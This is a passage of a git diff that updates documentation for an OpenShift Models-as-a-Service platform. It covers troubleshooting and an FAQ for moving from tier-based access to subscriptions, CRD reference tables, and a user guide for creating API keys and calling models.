== "my-model-name")' + +# Check if AuthPolicy was generated +kubectl get authpolicy -n llm -l maas.opendatahub.io/model=my-model-name + +# Check AuthPolicy status +kubectl describe authpolicy -n llm + +# Verify user is authenticated +oc whoami +``` + +### Models return 403 Forbidden + +**Symptom:** Models return 403 after migration + +**Possible Causes:** +- User's groups not in MaaSAuthPolicy subjects +- AuthPolicy not enforced yet + +**Resolution:** +```bash +# Check user's groups +oc whoami --show-groups + +# Check MaaSAuthPolicy groups +kubectl get maasauthpolicy my-model-premium-access -n models-as-a-service -o yaml + +# Verify groups match +kubectl get maasauthpolicy my-model-premium-access -n models-as-a-service -o jsonpath='{.spec.subjects.groups[*].name}' + +# Check AuthPolicy enforcement +kubectl get authpolicy -n llm -o jsonpath='{.items[*].status.conditions[?(@.type=="Enforced")].status}' + +# Check Authorino logs +kubectl logs -n openshift-ingress -l app.kubernetes.io/name=authorino --tail=50 +``` + +### Models return 429 Too Many Requests + +**Symptom:** Models immediately return 429 even on first request + +**Possible Causes:** +- No MaaSSubscription exists for the model +- User's groups not in MaaSSubscription owner groups +- TokenRateLimitPolicy not configured correctly + +**Resolution:** +```bash +# Check if MaaSSubscription exists for the model +kubectl get maassubscription -n models-as-a-service -o json | \ + jq -r '.items[] | select(.spec.modelRefs[]? | .name? 
== "my-model-name")' + +# Check if TokenRateLimitPolicy was generated +kubectl get tokenratelimitpolicy -n llm -l maas.opendatahub.io/model=my-model-name + +# Check TokenRateLimitPolicy status +kubectl describe tokenratelimitpolicy -n llm + +# Verify user's groups match subscription owner groups +oc whoami --show-groups +kubectl get maassubscription my-model-premium-subscription -n models-as-a-service -o jsonpath='{.spec.owner.groups[*].name}' + +# Check Limitador logs +kubectl logs -n kuadrant-system -l app.kubernetes.io/name=limitador --tail=50 +``` + +### maas-controller not creating policies + +**Symptom:** MaaSModelRef shows Ready but no AuthPolicy/TokenRateLimitPolicy created + +**Possible Causes:** +- maas-controller not watching correct namespace +- Controller reconciliation failed +- HTTPRoute not found + +**Resolution:** +```bash +# Check maas-controller logs +kubectl logs -n opendatahub -l app=maas-controller --tail=100 + +# Check MaaSModelRef status +kubectl get maasmodelref my-model-name -n llm -o yaml + +# Verify HTTPRoute exists +kubectl get httproute -n llm my-model-name + +# Check subscription namespace matches controller config +kubectl get deployment maas-controller -n opendatahub -o jsonpath='{.spec.template.spec.containers[0].env[?(@.name=="MAAS_SUBSCRIPTION_NAMESPACE")].value}' + +# Manually trigger reconciliation by updating MaaSAuthPolicy +kubectl annotate maasauthpolicy my-model-premium-access -n models-as-a-service \ + reconcile-trigger="$(date +%s)" --overwrite +``` + +### MaaSModelRef shows Pending or Failed + +**Symptom:** MaaSModelRef status.phase is Pending or Failed + +**Possible Causes:** +- LLMInferenceService not ready +- HTTPRoute not created by KServe yet +- Model namespace mismatch + +**Resolution:** +```bash +# Check MaaSModelRef status +kubectl describe maasmodelref my-model-name -n llm + +# Check LLMInferenceService status +kubectl get llminferenceservice my-model-name -n llm -o yaml + +# Check if HTTPRoute exists +kubectl 
get httproute -n llm my-model-name + +# Wait for KServe to create HTTPRoute +kubectl wait --for=condition=Ready llminferenceservice/my-model-name -n llm --timeout=5m + +# Check maas-controller logs for errors +kubectl logs -n opendatahub -l app=maas-controller | grep my-model-name +``` + +### Duplicate AuthPolicies (ODH Model Controller conflict) + +**Symptom:** Multiple AuthPolicies targeting the same HTTPRoute + +**Possible Causes:** +- Both ODH Model Controller and maas-controller creating AuthPolicies +- Policy ownership conflict + +**Resolution:** +```bash +# Check for multiple AuthPolicies on same route +kubectl get authpolicy -n llm -o json | \ + jq -r '.items[] | select(.spec.targetRef.name=="my-model-name") | .metadata.name' + +# Check managed-by labels +kubectl get authpolicy -n llm -o json | \ + jq -r '.items[] | "\(.metadata.name): \(.metadata.labels."app.kubernetes.io/managed-by")"' + +# Opt out ODH management +kubectl annotate authpolicy -n llm \ + opendatahub.io/managed=false + +# Or delete ODH-managed policy (maas-controller will recreate) +kubectl delete authpolicy -n llm +``` + +### ConfigMap changes not reflected + +**Symptom:** Updated tier-to-group-mapping not taking effect + +**Note:** After migration, tier-to-group-mapping ConfigMap is no longer used by the subscription model. + +**Resolution:** +- Update MaaSAuthPolicy and MaaSSubscription CRs instead of ConfigMap +- ConfigMap is only used if you haven't migrated yet + +```bash +# Update MaaSAuthPolicy groups +kubectl edit maasauthpolicy my-model-premium-access -n models-as-a-service + +# Update MaaSSubscription owner groups and limits +kubectl edit maassubscription my-model-premium-subscription -n models-as-a-service +``` + +## Frequently Asked Questions + +### Do I need to use API keys with the new subscription model? + +**No.** The new subscription model works with OpenShift tokens by default. 
The `gateway-default-auth` and per-route AuthPolicies use `kubernetesTokenReview` for authentication. + +API key support is optional and requires additional MaaS API configuration. The migration guide assumes you continue using OpenShift token authentication. + +### Can I have different rate limits for the same model? + +**Yes.** Create multiple MaaSSubscriptions for the same model with different owner groups and token limits. + +Example: +```yaml +# Basic tier: 100 tokens/min +--- +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSSubscription +metadata: + name: my-model-basic-subscription + namespace: models-as-a-service +spec: + owner: + groups: + - name: basic-users + modelRefs: + - name: my-model + namespace: llm + tokenRateLimits: + - limit: 100 + window: 1m + +# Premium tier: 10000 tokens/min +--- +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSSubscription +metadata: + name: my-model-premium-subscription + namespace: models-as-a-service +spec: + owner: + groups: + - name: premium-users + modelRefs: + - name: my-model + namespace: llm + tokenRateLimits: + - limit: 10000 + window: 1m +``` + +When a user belongs to multiple owner groups, the controller selects the subscription with the **highest token rate limit**. In this example, users in both groups get the premium subscription with 10000 tokens/min (higher than the basic subscription's 100 tokens/min). + +### What happens to users during migration? + +**With zero-downtime approach:** Users experience no interruption. The old tier-based system remains active until you validate and switch to the new system. + +**With full cutover:** Users may experience brief interruption during the maintenance window. + +### Do I need to restart MaaS API? + +**No.** MaaS API is unchanged. Only the tier lookup endpoint (`/v1/tiers/lookup`) becomes unused after migration. + +If you delete the `tier-to-group-mapping` ConfigMap, MaaS API will no longer serve tier information, but this doesn't require a restart. 
+ +### Can I migrate one model at a time? + +**Yes.** You can migrate models incrementally: + +1. Create MaaS CRs for one model +2. Test and validate +3. Remove tier annotation from that model +4. Repeat for next model + +This allows gradual migration with minimal risk. + +### What if a user is in multiple groups with different subscriptions? + +When a user belongs to multiple owner groups with different subscriptions for the same model, the controller selects the subscription with the **highest token rate limit** (the subscription with the highest `limit` value wins). + +**Example:** A user in both `basic-users` and `premium-users` groups: +- If `basic-subscription` has 100 tokens/min and `premium-subscription` has 10000 tokens/min, the user gets the premium subscription with 10000 tokens/min (highest limit wins). +- If both subscriptions have the same token rate limit, the controller uses an implementation-defined tie-breaker (not guaranteed to be stable). + +> **Note:** The `spec.priority` field exists in the MaaSSubscription CRD but is currently not used by the controller. Selection is based solely on token rate limit. + +### Can I still use the tier-to-group-mapping ConfigMap? + +**During migration:** Yes, both systems can coexist. + +**After migration:** The ConfigMap is no longer used by the subscription model. You can: +- Delete it if not needed +- Keep it if MaaS API uses it for other features (check API documentation) +- Annotate it as deprecated + +### How do I know which models a tier has access to? 
+ +In the old system, check the `alpha.maas.opendatahub.io/tiers` annotation on each LLMInferenceService: + +```bash +kubectl get llminferenceservice -n llm -o json | \ + jq -r '.items[] | "\(.metadata.name): \(.metadata.annotations."alpha.maas.opendatahub.io/tiers")"' +``` + +In the new system, check MaaSAuthPolicy: + +```bash +kubectl get maasauthpolicy -n models-as-a-service -o json | \ + jq -r '.items[] | "\(.metadata.name): \(.spec.modelRefs[])"' +``` + +### What happens if I don't create a MaaSSubscription for a model? + +Users with access (via MaaSAuthPolicy) will get **429 Too Many Requests** immediately because: + +1. The per-route AuthPolicy allows them (auth passes) +2. No per-route TokenRateLimitPolicy exists for them +3. gateway-default-deny kicks in with 0 token limit + +This is the "dual-gate" model: both auth AND subscription must pass. + +### Can I use the subscription model without MaaSAuthPolicy? + +**No.** Without MaaSAuthPolicy, no per-route AuthPolicy is created, so `gateway-default-auth` denies all requests (401/403). + +You must create both MaaSAuthPolicy (for access) and MaaSSubscription (for rate limits). + +### How do I grant access to all authenticated users? + +Use the `system:authenticated` group: + +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSAuthPolicy +metadata: + name: public-model-access + namespace: models-as-a-service +spec: + modelRefs: + - name: public-model + namespace: llm + subjects: + groups: + - name: system:authenticated + users: [] +``` + +This is equivalent to the old tier system's `free` tier with `system:authenticated` group. + +## Additional Resources + +- [Old vs New Flow Documentation](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/docs/old-vs-new-flow.md) +- [MaaS Controller README](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/README.md) +- [Deployment Guide](../quickstart.md) + +## Support + +For issues or questions: +1. 
Check the troubleshooting section above +2. Review [MaaS Controller logs](#troubleshooting) +3. Consult the [old-vs-new-flow.md](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/docs/old-vs-new-flow.md) for architectural details +4. Open an issue on GitHub with migration logs and error messages diff --git a/docs/content/quickstart.md b/docs/content/quickstart.md index 9760048d5..b0c8757c3 100644 --- a/docs/content/quickstart.md +++ b/docs/content/quickstart.md @@ -3,7 +3,7 @@ This guide provides quickstart instructions for deploying the MaaS Platform infrastructure. !!! note - For more detailed instructions, please refer to [Installation under the Administrator Guide](install/prerequisites.md). + For more detailed instructions, please refer to [Installation under the Install Guide](install/prerequisites.md). ## Prerequisites @@ -32,31 +32,54 @@ Before deploying MaaS, Authorino's listener TLS must be enabled. This is a platf For step-by-step commands, see [TLS Configuration: Authorino TLS Configuration](configuration-and-management/tls-configuration.md#authorino-tls-configuration). !!! tip "Automated configuration" - The `deploy-rhoai-stable.sh` script automatically configures all remaining TLS settings after deployment, including Gateway TLS bootstrap and Authorino → maas-api outbound TLS. + The `deploy.sh` script automatically configures all remaining TLS settings after deployment, including Gateway TLS bootstrap and Authorino → maas-api outbound TLS. ## Quick Start -### Automated OpenShift Deployment (Recommended) +### Automated OpenShift Deployment -For OpenShift clusters, use the unified automated deployment script: +For OpenShift clusters, use the unified automated deployment script. 
Choose your deployment method: -```bash -export MAAS_REF="main" # Use the latest release tag, or "main" for development +=== "Operator (Recommended)" -# Deploy using RHOAI operator (default) -./scripts/deploy.sh + Deploy MaaS through the RHOAI or ODH operator. This is the recommended approach for production deployments. -# Or deploy using ODH operator -./scripts/deploy.sh --operator-type odh + ```bash + export MAAS_REF="main" # Use the latest release tag, or "main" for development -# Or deploy using kustomize -./scripts/deploy.sh --deployment-mode kustomize -``` + # Deploy using RHOAI operator (default) + ./scripts/deploy.sh + + # Or deploy using ODH operator + ./scripts/deploy.sh --operator-type odh + ``` + + !!! note "Using Release Tags" + The `MAAS_REF` environment variable should reference a release tag (e.g., `v1.0.0`) for production deployments. + The release workflow automatically updates all `MAAS_REF="main"` references in documentation and scripts + to use the new release tag when a release is created. Use `"main"` only for development/testing. + +=== "Kustomize (Development Only)" + + !!! warning "Development Use Only" + Kustomize deployment is intended for **development and testing purposes only**. For production deployments, use the Operator install tab above instead. -!!! note "Using Release Tags" - The `MAAS_REF` environment variable should reference a release tag (e.g., `v1.0.0`) for production deployments. - The release workflow automatically updates all `MAAS_REF="main"` references in documentation and scripts - to use the new release tag when a release is created. Use `"main"` only for development/testing. + !!! note "Prerequisites: Run hack scripts first" + Before deploying with kustomize, you must run the two hack scripts to install cert-manager, LeaderWorkerSet (LWS), and the ODH operator. Run them in order: + + 1. **cert-manager and LWS**: `./.github/hack/install-cert-manager-and-lws.sh` + 2. 
**ODH operator**: `./.github/hack/install-odh.sh` + + ```bash + export MAAS_REF="main" # Use the latest release tag, or "main" for development + + ./scripts/deploy.sh --deployment-mode kustomize + ``` + + !!! note "Using Release Tags" + The `MAAS_REF` environment variable should reference a release tag (e.g., `v1.0.0`) for production deployments. + The release workflow automatically updates all `MAAS_REF="main"` references in documentation and scripts + to use the new release tag when a release is created. Use `"main"` only for development/testing. ### Verify Deployment @@ -103,79 +126,6 @@ kubectl get pods -n redhat-ods-applications For detailed validation and troubleshooting, see the [Validation Guide](install/validation.md). -## Model Setup - -!!! note - At least one model must be deployed to validate the installation using the [Validation Guide](install/validation.md). - -### Deploy Sample Models - -#### Simulator Model (CPU) - -A lightweight mock service for testing that generates responses without running an actual language model. - -```bash -PROJECT_DIR=$(git rev-parse --show-toplevel) -kustomize build ${PROJECT_DIR}/docs/samples/models/simulator/ | kubectl apply -f - -``` - -#### Facebook OPT-125M Model (CPU) - -An inference deployment that loads and runs a 125M parameter model without the need for a GPU. - -```bash -PROJECT_DIR=$(git rev-parse --show-toplevel) -kustomize build ${PROJECT_DIR}/docs/samples/models/facebook-opt-125m-cpu/ | kubectl apply -f - -``` - -#### Qwen3 Model (GPU Required) - -⚠️ This model requires GPU nodes with `nvidia.com/gpu` resources available in your cluster. 
- -```bash -PROJECT_DIR=$(git rev-parse --show-toplevel) -kustomize build ${PROJECT_DIR}/docs/samples/models/qwen3/ | kubectl apply -f - -``` - -#### Verify Model Deployment - -```bash -# Check LLMInferenceService status -kubectl get llminferenceservices -n llm - -# Check pods -kubectl get pods -n llm -``` - -#### Update Existing Models (Optional) - -To update an existing model, modify the `LLMInferenceService` to use the newly created `maas-default-gateway` gateway. - -```bash -kubectl patch llminferenceservice my-production-model -n llm --type='json' -p='[ - { - "op": "add", - "path": "/spec/gateway/refs/-", - "value": { - "name": "maas-default-gateway", - "namespace": "openshift-ingress" - } - } -]' -``` - -```yaml -apiVersion: serving.kserve.io/v1alpha1 -kind: LLMInferenceService -metadata: - name: my-production-model -spec: - gateway: - refs: - - name: maas-default-gateway - namespace: openshift-ingress -``` - ## Next Steps -After installation, proceed to [Validation](install/validation.md) to test and verify your deployment. +After deployment, proceed to [Model Setup (On Cluster)](install/model-setup.md) to deploy sample models, then [Validation](install/validation.md) to test and verify your deployment. diff --git a/docs/content/reference/api-reference.md b/docs/content/reference/api-reference.md new file mode 100644 index 000000000..1ff5827f2 --- /dev/null +++ b/docs/content/reference/api-reference.md @@ -0,0 +1,4 @@ + + +!!! note "Display issues" + If the interactive API documentation above does not fully load (endpoints, schemas, or "Try it out" are missing), reload the page to display it correctly. diff --git a/docs/content/reference/crds/external-model.md b/docs/content/reference/crds/external-model.md new file mode 100644 index 000000000..6ca3291cc --- /dev/null +++ b/docs/content/reference/crds/external-model.md @@ -0,0 +1,68 @@ +# ExternalModel + +Defines an external AI/ML model hosted outside the cluster (e.g., OpenAI, Anthropic, Azure OpenAI). 
The ExternalModel CRD contains provider details, endpoint URL, and credential references that were previously inlined in MaaSModelRef. + +## ExternalModelSpec + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| provider | string | Yes | Provider identifier (e.g., `openai`, `anthropic`, `azure`). Max length: 63 characters. | +| endpoint | string | Yes | FQDN of the external provider (no scheme or path), e.g., `api.openai.com`. This is metadata for downstream consumers. Max length: 253 characters. | +| credentialRef | CredentialReference | Yes | Reference to the Secret containing API credentials. Must exist in the same namespace as the ExternalModel. | + +## CredentialReference + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| name | string | Yes | Name of the Secret containing the credentials. Must be in the same namespace as the ExternalModel. Max length: 253 characters. | + +## ExternalModelStatus + +| Field | Type | Description | +|-------|------|-------------| +| phase | string | One of: `Pending`, `Ready`, `Failed` | +| conditions | []Condition | Latest observations of the external model's state | + +## Example + +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: ExternalModel +metadata: + name: gpt4 + namespace: models +spec: + provider: openai + endpoint: api.openai.com + credentialRef: + name: openai-credentials +--- +apiVersion: v1 +kind: Secret +metadata: + name: openai-credentials + namespace: models +type: Opaque +stringData: + api-key: "sk-..." +--- +# MaaSModelRef referencing the ExternalModel +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSModelRef +metadata: + name: gpt4-model + namespace: models +spec: + modelRef: + kind: ExternalModel + name: gpt4 +``` + +## Relationship with MaaSModelRef + +ExternalModel is a dedicated CRD for external model configuration. 
MaaSModelRef references ExternalModel by name using `spec.modelRef.kind: ExternalModel` and `spec.modelRef.name: <externalmodel-name>`. + +This separation allows: +- **Reusability**: One ExternalModel can be referenced by multiple MaaSModelRefs +- **Clean separation**: Provider-specific configuration lives in ExternalModel; MaaSModelRef handles listing and access control +- **Extensibility**: Adding new external providers requires no MaaSModelRef schema changes diff --git a/docs/content/reference/crds/maas-auth-policy.md b/docs/content/reference/crds/maas-auth-policy.md new file mode 100644 index 000000000..936096c35 --- /dev/null +++ b/docs/content/reference/crds/maas-auth-policy.md @@ -0,0 +1,33 @@ +# MaaSAuthPolicy + +Defines who (groups/users) can access which models. Creates Kuadrant AuthPolicies that validate API keys via MaaS API callback and perform subscription selection. Must be created in the `models-as-a-service` namespace. + +## MaaSAuthPolicySpec + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| modelRefs | []ModelRef | Yes | List of `{name, namespace}` references to MaaSModelRef resources | +| subjects | SubjectSpec | Yes | Who has access (OR logic—any match grants access) | +| meteringMetadata | MeteringMetadata | No | Billing and tracking information | + +## SubjectSpec + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| groups | []GroupReference | No | List of Kubernetes group names | +| users | []string | No | List of Kubernetes user names | + +At least one of `groups` or `users` must be specified. 
+ +## ModelRef (modelRefs item) + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| name | string | Yes | Name of the MaaSModelRef | +| namespace | string | Yes | Namespace where the MaaSModelRef lives | + +## GroupReference + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| name | string | Yes | Name of the group | diff --git a/docs/content/reference/crds/maas-model-ref.md b/docs/content/reference/crds/maas-model-ref.md new file mode 100644 index 000000000..b6b326cd9 --- /dev/null +++ b/docs/content/reference/crds/maas-model-ref.md @@ -0,0 +1,28 @@ +# MaaSModelRef + +Identifies an AI/ML model on the cluster. Create MaaSModelRef in the **same namespace** as the backend (`LLMInferenceService`, `ExternalModel`, etc.). The MaaS API lists models from MaaSModelRef resources cluster-wide (using `status.endpoint` and `status.phase`). + +## MaaSModelRefSpec + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| modelRef | ModelReference | Yes | Reference to the model endpoint | + +## ModelReference + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| kind | string | Yes | One of: `LLMInferenceService`, `ExternalModel` | +| name | string | Yes | Name of the model resource (e.g. LLMInferenceService name, ExternalModel name). Must be in the same namespace as the MaaSModelRef. Max length: 253 characters. | + +For `kind: ExternalModel`, the MaaSModelRef references an [ExternalModel](external-model.md) CR that contains the provider configuration. 
+ +## MaaSModelRefStatus + +| Field | Type | Description | +|-------|------|-------------| +| phase | string | One of: `Pending`, `Ready`, `Unhealthy`, `Failed` | +| endpoint | string | Endpoint URL for the model | +| httpRouteName | string | Name of the HTTPRoute associated with this model | +| httpRouteNamespace | string | Namespace of the HTTPRoute | +| conditions | []Condition | Latest observations of the model's state | diff --git a/docs/content/reference/crds/maas-subscription.md b/docs/content/reference/crds/maas-subscription.md new file mode 100644 index 000000000..775311b75 --- /dev/null +++ b/docs/content/reference/crds/maas-subscription.md @@ -0,0 +1,36 @@ +# MaaSSubscription + +Defines a subscription plan with per-model token rate limits. Creates Kuadrant TokenRateLimitPolicies enforced by Limitador. Must be created in the `models-as-a-service` namespace. + +## MaaSSubscriptionSpec + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| owner | OwnerSpec | Yes | Who owns this subscription | +| modelRefs | []ModelSubscriptionRef | Yes | Models included with per-model token rate limits (each specifies `name` and `namespace`) | +| tokenMetadata | TokenMetadata | No | Metadata for token attribution and metering | +| priority | int32 | No | Subscription priority when user has multiple (higher = higher priority; default: 0) | + +## OwnerSpec + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| groups | []GroupReference | No | Kubernetes group names that own this subscription | +| users | []string | No | Kubernetes user names that own this subscription | + +## ModelSubscriptionRef + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| name | string | Yes | Name of the MaaSModelRef | +| namespace | string | Yes | Namespace where the MaaSModelRef lives | +| tokenRateLimits | []TokenRateLimit | No | Token-based rate limits for this model | +| 
tokenRateLimitRef | string | No | Reference to an existing TokenRateLimit resource | +| billingRate | BillingRate | No | Cost per token | + +## TokenRateLimit + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| limit | int64 | Yes | Maximum number of tokens allowed | +| window | string | Yes | Time window (e.g., `1m`, `1h`, `24h`). Pattern: `^(\d+)(s|m|h|d)$` | diff --git a/docs/content/reference/maas-api-overview.md b/docs/content/reference/maas-api-overview.md new file mode 100644 index 000000000..b339f006d --- /dev/null +++ b/docs/content/reference/maas-api-overview.md @@ -0,0 +1,64 @@ +# MaaS API Overview + +This page provides a high-level overview of the MaaS API endpoints. For full request/response schemas and interactive documentation, see [MaaS API (Swagger)](api-reference.md). + +## Authentication + +All endpoints except `/health` require authentication via the `Authorization: Bearer <token>` header. Use either: + +- **OpenShift token** — from `oc whoami -t` for interactive use +- **API key** — created via `POST /v1/api-keys` for programmatic access + +--- + +## Endpoints by Category + +### Health + +| Method | Path | Description | +|--------|------|-------------| +| GET | `/health` | Health check. No authentication required. Used by load balancers and monitoring. | + +### Models + +| Method | Path | Description | +|--------|------|-------------| +| GET | `/v1/models` | List available LLMs in OpenAI-compatible format. Returns models the authenticated user can access. | + +### Tiers (Legacy) + +| Method | Path | Description | +|--------|------|-------------| +| POST | `/v1/tiers/lookup` | Look up the highest subscription tier for a set of groups. Used by tier-based access control. | + +!!! note "Subscription model" + The subscription-based architecture (MaaSAuthPolicy, MaaSSubscription) is the current approach. The tiers endpoint is retained for backward compatibility with tier-based deployments. 
+ +### API Keys + +| Method | Path | Description | +|--------|------|-------------| +| POST | `/v1/api-keys` | Create a new API key. Returns plaintext key **once**; only the hash is stored. Optional body field `subscription` selects the MaaSSubscription; if omitted, the highest-priority accessible subscription is used. | +| POST | `/v1/api-keys/search` | Search and filter API keys with pagination, sorting, and status filters. | +| GET | `/v1/api-keys/{id}` | Get metadata for a specific API key. | +| DELETE | `/v1/api-keys/{id}` | Revoke a specific API key. | +| POST | `/v1/api-keys/bulk-revoke` | Revoke all active API keys for a user. Admins can revoke any user's keys. | + +--- + +## Base URL + +The MaaS API is typically exposed under a path prefix, for example: + +- `https://maas.example.com/maas-api` +- `https://<cluster-domain>/maas-api` + +Use the base URL appropriate for your deployment when calling these endpoints. + +--- + +## Next Steps + +- **[MaaS API (Swagger)](api-reference.md)** — Interactive API documentation with full schemas and "Try it out" +- **[Token Management](../configuration-and-management/token-management.md)** — How to create and use API keys +- **[Self-Service Model Access](../user-guide/self-service-model-access.md)** — End-user guide for getting an API key and calling models diff --git a/docs/content/release-notes/index.md b/docs/content/release-notes/index.md new file mode 100644 index 000000000..b608aeacb --- /dev/null +++ b/docs/content/release-notes/index.md @@ -0,0 +1,7 @@ +# Release Notes + +## v0.1.0 + +*Initial release.* + + diff --git a/docs/content/user-guide/self-service-model-access.md b/docs/content/user-guide/self-service-model-access.md index 5392c596b..70eeeb3b1 100644 --- a/docs/content/user-guide/self-service-model-access.md +++ b/docs/content/user-guide/self-service-model-access.md @@ -6,10 +6,10 @@ This guide is for **end users** who want to use AI models through the MaaS platf The Models-as-a-Service (MaaS) platform provides access 
to AI models through a simple API. Your organization's administrator has set up the platform and configured access for your team. -## Getting Your Access Token +## Getting Your API Key !!! tip - For a detailed explanation of how token authentication works, including the underlying service account architecture and security model, see [Understanding Token Management](../configuration-and-management/token-management.md). + For a detailed explanation of how API key authentication works, including the underlying architecture and security model, see [Understanding Token Management](../configuration-and-management/token-management.md). ### Step 1: Get Your OpenShift Authentication Token @@ -23,43 +23,53 @@ oc login ... OC_TOKEN=$(oc whoami -t) ``` -### Step 2: Request an Access Token from the API +### Step 2: Create an API Key -Next, use that OpenShift token to call the maas-api `/v1/tokens` endpoint. You can specify the desired expiration time; the default is 4 hours. +Use your OpenShift token to create an API key via the maas-api `/v1/api-keys` endpoint. You can create permanent keys (omit `expiresIn`) or expiring keys. + +- Optional `subscription`: MaaSSubscription resource name to bind to this key. If you omit it, the platform picks your **highest-priority** accessible subscription (`spec.priority`). +- The response includes `subscription`: the bound name (same flow whether you set it explicitly or not). 
```bash CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}') MAAS_API_URL="https://maas.${CLUSTER_DOMAIN}" -TOKEN_RESPONSE=$(curl -sSk \ +API_KEY_RESPONSE=$(curl -sSk \ -H "Authorization: Bearer ${OC_TOKEN}" \ -H "Content-Type: application/json" \ -X POST \ - -d '{"expiration": "15m"}' \ - "${MAAS_API_URL}/maas-api/v1/tokens") + -d '{"name": "my-api-key", "description": "Key for model access", "expiresIn": "90d", "subscription": "simulator-subscription"}' \ + "${MAAS_API_URL}/maas-api/v1/api-keys") -ACCESS_TOKEN=$(echo $TOKEN_RESPONSE | jq -r .token) +API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key) +SUBSCRIPTION=$(echo $API_KEY_RESPONSE | jq -r .subscription) -echo $ACCESS_TOKEN +echo "Key prefix: ${API_KEY:0:16}..." +echo "Bound subscription: ${SUBSCRIPTION}" ``` -### Token Lifecycle +Replace `simulator-subscription` with your MaaSSubscription metadata name, or remove the `subscription` field to bind the **highest-priority** subscription you can access. + +!!! warning "API key shown only once" + The plaintext API key is returned **only at creation time**. We do not store the API key, so there is no way to retrieve it again. Store it securely when it is displayed. If you run into errors, see [Troubleshooting](../install/troubleshooting.md). 
+ +### API Key Lifecycle -- **Default lifetime**: 4 hours (configurable when requesting) -- **Maximum lifetime**: Determined by cluster configuration -- **Refresh**: Request a new token before expiration -- **Revocation**: Tokens can be revoked if compromised +- **Permanent keys**: Omit `expiresIn` in the request body +- **Expiring keys**: Set `expiresIn` (e.g., `"90d"`, `"1h"`, `"30d"`) +- **Subscription**: Fixed at creation; mint a new key to change it +- **Revocation**: Revoke via `DELETE /v1/api-keys/{id}` if compromised ## Discovering Models ### List Available Models -Get a list of models available to your tier: +Get a list of models available to your subscription: ```bash MODELS=$(curl "${MAAS_API_URL}/v1/models" \ -H "Content-Type: application/json" \ - -H "Authorization: Bearer ${ACCESS_TOKEN}") + -H "Authorization: Bearer ${API_KEY}") echo $MODELS | jq . ``` @@ -73,13 +83,13 @@ Example response: "id": "simulator", "name": "Simulator Model", "url": "https://gateway.your-domain.com/simulator/v1/chat/completions", - "tier": "free" + "subscription": "free" }, { "id": "qwen3", "name": "Qwen3 Model", "url": "https://gateway.your-domain.com/qwen3/v1/chat/completions", - "tier": "premium" + "subscription": "premium" } ] } @@ -92,7 +102,7 @@ Get detailed information about a specific model: ```bash MODEL_ID="simulator" MODEL_INFO=$(curl "${MAAS_API_URL}/v1/models" \ - -H "Authorization: Bearer ${ACCESS_TOKEN}" | \ + -H "Authorization: Bearer ${API_KEY}" | \ jq --arg model "$MODEL_ID" '.data[] | select(.id == $model)') echo $MODEL_INFO | jq . @@ -100,6 +110,8 @@ echo $MODEL_INFO | jq . ## Making Inference Requests +Use **only** your API key in `Authorization: Bearer`. The subscription is fixed when the key was created. 
+ ### Basic Chat Completion Make a simple chat completion request: @@ -108,12 +120,12 @@ Make a simple chat completion request: # First, get the model URL from the models endpoint MODELS=$(curl "${MAAS_API_URL}/v1/models" \ -H "Content-Type: application/json" \ - -H "Authorization: Bearer ${ACCESS_TOKEN}") + -H "Authorization: Bearer ${API_KEY}") MODEL_URL=$(echo $MODELS | jq -r '.data[0].url') MODEL_NAME=$(echo $MODELS | jq -r '.data[0].id') curl -sSk \ - -H "Authorization: Bearer ${ACCESS_TOKEN}" \ + -H "Authorization: Bearer ${API_KEY}" \ -H "Content-Type: application/json" \ -d "{ \"model\": \"${MODEL_NAME}\", @@ -134,7 +146,7 @@ For streaming responses, add `"stream": true` to the request and use `--no-buffe ```bash curl -sSk --no-buffer \ - -H "Authorization: Bearer ${ACCESS_TOKEN}" \ + -H "Authorization: Bearer ${API_KEY}" \ -H "Content-Type: application/json" \ -d "{ \"model\": \"${MODEL_NAME}\", @@ -152,20 +164,14 @@ curl -sSk --no-buffer \ ## Understanding Your Access Level -Your access is determined by your **tier**, which controls: +Your access is determined by your **subscription**, which controls: - **Available models** - Which AI models you can use - **Request limits** - How many requests per minute - **Token limits** - Maximum tokens per request - **Features** - Advanced capabilities available -### Default Tiers - -| Tier | Requests/min | Tokens/min | -|------|--------------|------------| -| Free | 5 | 100 | -| Premium | 20 | 50,000 | -| Enterprise | 50 | 100,000 | +Rate limits are configured per-model in MaaSAuthPolicy and MaaSSubscription. Contact your administrator for your subscription's limits. 
## Error Handling @@ -214,7 +220,7 @@ Check your current usage through response headers: ```bash # Make a request and check headers curl -I -sSk \ - -H "Authorization: Bearer ${ACCESS_TOKEN}" \ + -H "Authorization: Bearer ${API_KEY}" \ -H "Content-Type: application/json" \ -d '{"model": "simulator", "messages": [{"role": "user", "content": "test"}]}' \ "${MODEL_URL}/v1/chat/completions" | grep -i "x-ratelimit" @@ -226,29 +232,29 @@ curl -I -sSk \ **Problem**: `401 Unauthorized` -**Solution**: Check your token and ensure it's correctly formatted: +**Solution**: Check your API key and ensure it's correctly formatted: ```bash # Correct format --H "Authorization: Bearer YOUR_TOKEN" +-H "Authorization: Bearer YOUR_API_KEY" # Wrong format --H "Authorization: YOUR_TOKEN" +-H "Authorization: YOUR_API_KEY" ``` ### Rate Limit Exceeded **Problem**: `429 Too Many Requests` -**Solution**: Wait before making more requests, or contact your administrator to upgrade your tier. +**Solution**: Wait before making more requests, or contact your administrator to adjust your subscription limits. 
